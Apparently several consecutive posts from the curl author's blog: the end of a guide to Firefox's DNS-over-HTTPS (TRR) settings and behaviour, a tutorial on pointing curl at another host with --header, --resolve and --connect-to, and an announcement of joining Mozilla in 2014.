network.trr.early-AAAA – (default: false) For each normal name resolve, Firefox issues one HTTP request for A entries and another for AAAA entries. The responses come back separately and can come in any order. If the A records arrive first, Firefox will – as an optimization – continue and use those addresses without waiting for the second response. If the AAAA records arrive first, Firefox will only continue and use them immediately if this option is set to true.

network.trr.max-fails – (default: 5) If this many DoH requests in a row fails, consider TRR broken and go back to verify-NS state. This is meant to detect situations when the DoH server dies.

network.trr.disable-ECS – (default: true) If set, TRR asks the resolver to disable ECS (EDNS Client Subnet – the method where the resolver passes on the subnet of the client asking the question). Some resolvers will use ECS to the upstream if this request is not passed on to them.

Split-horizon and blacklist

With regular DNS, it is common to have clients in different places get different results back. This can be done since the servers know from where the request comes (which also enables quite a degree of spying) and they can then respond accordingly. When switching to another resolver with TRR, you may experience that you don’t always get the same set of addresses back. At times, this causes problems.

As a precaution, Firefox features a system that detects if a name can’t be resolved at all with TRR and can then fall back and try again with just the native resolver (the so called TRR-first mode). Ending up in this scenario is of course slower and leaks the name over clear-text UDP but this safety mechanism exists to avoid users risking ending up in a black hole where certain sites can’t be accessed. Names that causes such TRR failures are then put in an internal dynamic blacklist so that subsequent uses of that name automatically avoids using DNS-over-HTTPS for a while (see the blacklist-duration pref to control that period). Of course this fall-back is not in use if TRR-only mode is selected.

In addition, if a host’s address is retrieved via TRR and Firefox subsequently fails to connect to that host, it will redo the resolve without DOH and retry the connect again just to make sure that it wasn’t a split-horizon situation that caused the problem.

When a host name is added to the TRR blacklist, its domain also gets checked in the background to see if that whole domain perhaps should be blacklisted to ensure a smoother ride going forward.

Additionally, “localhost” and all names in the “.local” TLD are sort of hard-coded as blacklisted and will never be resolved with TRR. (Unless you run TRR-only…)

TTL as a bonus!

With the implementation of DNS-over-HTTPS, Firefox now gets the TTL (Time To Live, how long a record is valid) value for each DNS address record and can store and use that for expiry time in its internal DNS cache. Having accurate lifetimes improves the cache as it then knows exactly how long the name is meant to work and means less guessing and heuristics.

When using the native name resolver functions, this time-to-live data is normally not provided and Firefox does in fact not use the TTL on other platforms than Windows and on Windows it has to perform some rather awkward quirks to get the TTL from DNS for each record.

Server push

Still left to see how useful this will become in real-life, but DOH servers can push new or updated DNS records to Firefox. HTTP/2 Server Push being responses to requests the client didn’t send but the server thinks the client might appreciate anyway as if it sent requests for those resources.

These pushed DNS records will be treated as regular name resolve responses and feed the Firefox in-memory DNS cache, making subsequent resolves of those names to happen instantly.

Bootstrap

You specify the DOH service as a full URI with a name that needs to be resolved, and in a cold start Firefox won’t know the IP address of that name and thus needs to resolve it first (or use the provided address you can set with network.trr.bootstrapAddress). Firefox will then use the native resolver for that, until TRR has proven itself to work by resolving the network.trr.confirmationNS test domain. Firefox will also by default wait for the captive portal check to signal “OK” before it uses TRR, unless you tell it otherwise.

As a result of this bootstrap procedure, and if you’re not in TRR-only mode, you might still get  a few native name resolves done at initial Firefox startups. Just telling you this so you don’t panic if you see a few show up.

CNAME

The code is aware of CNAME records and will “chase” them down and use the final A/AAAA entry with its TTL as if there were no CNAMEs present and store that in the in-memory DNS cache. This initial approach, at least, does not cache the intermediate CNAMEs nor does it care about the CNAME TTL values.

Firefox currently allows no more than 64(!) levels of CNAME redirections.

about:networking

Enter that address in the Firefox URL bar to reach the debug screen with a bunch of networking information. If you then click the DNS entry in the left menu, you’ll get to see the contents of Firefox’s in-memory DNS cache. The TRR column says true or false for each name if that was resolved using TRR or not. If it wasn’t, the native resolver was used instead for that name.

Private Browsing

When in private browsing mode, DOH behaves similar to regular name resolves: it keeps DNS cache entries separately from the regular ones and the TRR blacklist is then only kept in memory and not persisted to disk. The DNS cache is flushed when the last PB session is exited.

Tools

I wrote up dns2doh, a little tool to create DOH requests and responses with, that can be used to build your own toy server with and to generate requests to send with curl or similar.

It allows you to manually issue a type A (regular IPv4 address) DOH request like this:

$ dns2doh --A --onlyq --raw daniel.haxx.se | \
curl --data-binary @- \
https://dns.cloudflare.com/.well-known/dns \
-H "Content-Type: application/dns-udpwireformat"

I also wrote doh, which is a small stand-alone tool (based on libcurl) that issues requests for the A and AAAA records of a given host name from the given DOH URI.

Why HTTPS

Some people giggle and think of this as a massive layer violation. Maybe it is, but doing DNS over HTTPS makes a lot of sense compared to for example using plain TLS:

  1. We get transparent and proxy support “for free”
  2. We get multiplexing and the use of persistent connections from the get go (this can be supported by DNS-over-TLS too, depending on the implementation)
  3. Server push is a potential real performance booster
  4. Browsers often already have a lot of existing HTTPS connections to the same CDNs that might offer DOH.

Further explained in Patrick Mcmanus’ The Benefits of HTTPS for DNS.

It still leaks the SNI!

Yes, the Server Name Indication field in the TLS handshake is still clear-text, but we hope to address that as well in the future with efforts like encrypted SNI.

Bugs?

File bug reports in Bugzilla! (in “Core->Networking:DNS” please)

If you want to enable HTTP logging and see what TRR is doing, set the environment variable MOZ_LOG component and level to “nsHostResolver:5”. The TRR implementation source code in Firefox lives in netwerk/dns.

Caveats

Credits

While I have written most of the Firefox TRR implementation, I’ve been greatly assisted by Patrick Mcmanus. Valentin Gosu, Nick Hurley and others in the Firefox Necko team.

DOH in curl?

Since I am also the lead developer of curl people have asked. The work on DOH for curl has not really started yet, but I’ve collected some thoughts on how DNS-over-HTTPS could be implemented in curl and the doh tool I mentioned above has the basic function blocks already written.

Other efforts to enhance DNS security

There have been other DNS-over-HTTPS protocols and efforts. Recently there was one offered by at least Google that was a JSON style API. That’s different.

There’s also DNS-over-TLS which shares some of the DOH characteristics, but lacks for example the nice ability to work through proxies, do multiplexing and share existing connections with standard web traffic.

DNScrypt is an older effort that encrypts regular DNS packets and sends them over UDP or TCP.

curl another host

Sometimes you want to issue a curl command against a server, but you don’t really want curl to resolve the host name in the given URL and use that, you want to tell it to go elsewhere. To the “wrong” host, which in this case of course happens to be the right host. Because you know better.

Don’t worry. curl covers this as well, in several different ways…

Fake the host header

The classic and and easy to understand way to send a request to the wrong HTTP host is to simply send a different Host: header so that the server will provide a response for that given server.

If you run your “example.com” HTTP test site on localhost and want to verify that it works:

curl --header "Host: example.com" http://127.0.0.1/

curl will also make cookies work for example.com in this case, but it will fail miserably if the page redirects to another host and you enable redirect-following (--location) since curl will send the fake Host: header in all further requests too.

The --header option cleverly cancels the built-in provided Host: header when a custom one is provided so only the one passed in from the user gets sent in the request.

Fake the host header better

We’re using HTTPS everywhere these days and just faking the Host: header is not enough then. An HTTPS server also needs to get the server name provided already in the TLS handshake so that it knows which cert etc to use. The name is provided in the SNI field. curl also needs to know the correct host name to verify the server certificate against (server certificates are rarely registered for an IP address). curl extracts the name to use in both those case from the provided URL.

As we can’t just put the IP address in the URL for this to work, we reverse the approach and instead give curl the proper URL but with a custom IP address to use for the host name we set. The --resolve command line option is our friend:

curl --resolve example.com:443:127.0.0.1 https://example.com/

Under the hood this option populates curl’s DNS cache with a custom entry for “example.com” port 443 with the address 127.0.0.1, so when curl wants to connect to this host name, it finds your crafted address and connects to that instead of the IP address a “real” name resolve would otherwise return.

This method also works perfectly when following redirects since any further use of the same host name will still resolve to the same IP address and redirecting to another host name will then resolve properly. You can even use this option multiple times on the command line to add custom addresses for several names. You can also add multiple IP addresses for each name if you want to.

Connect to another host by name

As shown above, --resolve is awesome if you want to point curl to a specific known IP address. But sometimes that’s not exactly what you want either.

Imagine you have a host name that resolves to a number of different host names, possibly a number of front end servers for the same site/service. Not completely unheard of. Now imagine you want to issue your curl command to one specific server out of the front end servers. It’s a server that serves “example.com” but the individual server is called “host-47.example.com”.

You could resolve the host name in a first step before curl is used and use --resolve as shown above.

Or you can use --connect-to, which instead works on a host name basis. Using this, you can make curl replace a specific host name + port number pair with another host name + port number pair before the name is resolved!

curl --connect-to example.com:443:host-47.example.com:443 https://example.com/

Crazy combos

Most options in curl are individually controlled which means that there’s rarely logic that prevents you from using them in the awesome combinations that you can think of.

--resolve, --connect-to and --header can all be used in the same command line!

Connect to a HTTPS host running on localhost, use the correct name for SNI and certificate verification, but then still ask for a separate host in the Host: header? Sure, no problem:

curl --resolve example.com:443:127.0.0.1 https://example.com/ --header "Host: diff.example.com"

All the above with libcurl?

When you’re done playing with the curl options as described above and want to convert your command lines to libcurl code instead, your best friend is called --libcurl.

Just append --libcurl example.c to your command line, and curl will generate the C code template for you in that given file name. Based on that template, making use of  that code correctly is usually straight-forward and you’ll get all the options to read up in a convenient way.

Good luck!

Update: thanks to @Manawyrm, I fixed the ndash issues this post originally had.

I go Mozilla

Mozilla dinosaur head logo

In January 2014, I start working for Mozilla

I’ve worked in open source projects for some 20 years and I’ve maintained curl and libcurl for over 15 years. I’m an internet protocol geek at heart and Mozilla seems like a perfect place for me to continue to explore this interest of mine and combine it with real open source in its purest form.

I plan to use my experiences from all my years of protocol fiddling and making stuff work on different platforms against random server implementations into the networking team at Mozilla and work on improving Firefox and more.

I’m putting my current embedded Linux focus to the side and I plunge into a worldwide known company with worldwide known brands to do open source within the internet protocols I enjoy so much. I’ll be working out of my home, just outside Stockholm Sweden. Mozilla has no office in my country and I have no immediate plans of moving anywhere (with a family, kids and all established here).

I intend to bring my mindset on protocols and how to do things well into the Mozilla networking stack and world and I hope and expect that I will get inspiration and input from Mozilla and take that back and further improve curl over time. My agreement with Mozilla also gives me a perfect opportunity to increase my commitment to curl and curl development. I want to maintain and possibly increase my involvement in IETF and the httpbis work with http2 and related stuff. With one foot in Firefox and one in curl going forward, I think I may have a somewhat unique position and attitude toward especially HTTP.

I’ve not yet met another Swedish Mozillian but I know I’m not the only one located in Sweden. I guess I now have a reason to look them up and say hello when suitable.

Björn and Linus will continue to drive and run Haxx with me taking a step back into the shadows (Haxx-wise). I’ll still be part of the collective Haxx just as I was for many years before I started working full-time for Haxx in 2009. My email address, my sites etc will remain on haxx.se.

I’m looking forward to 2014!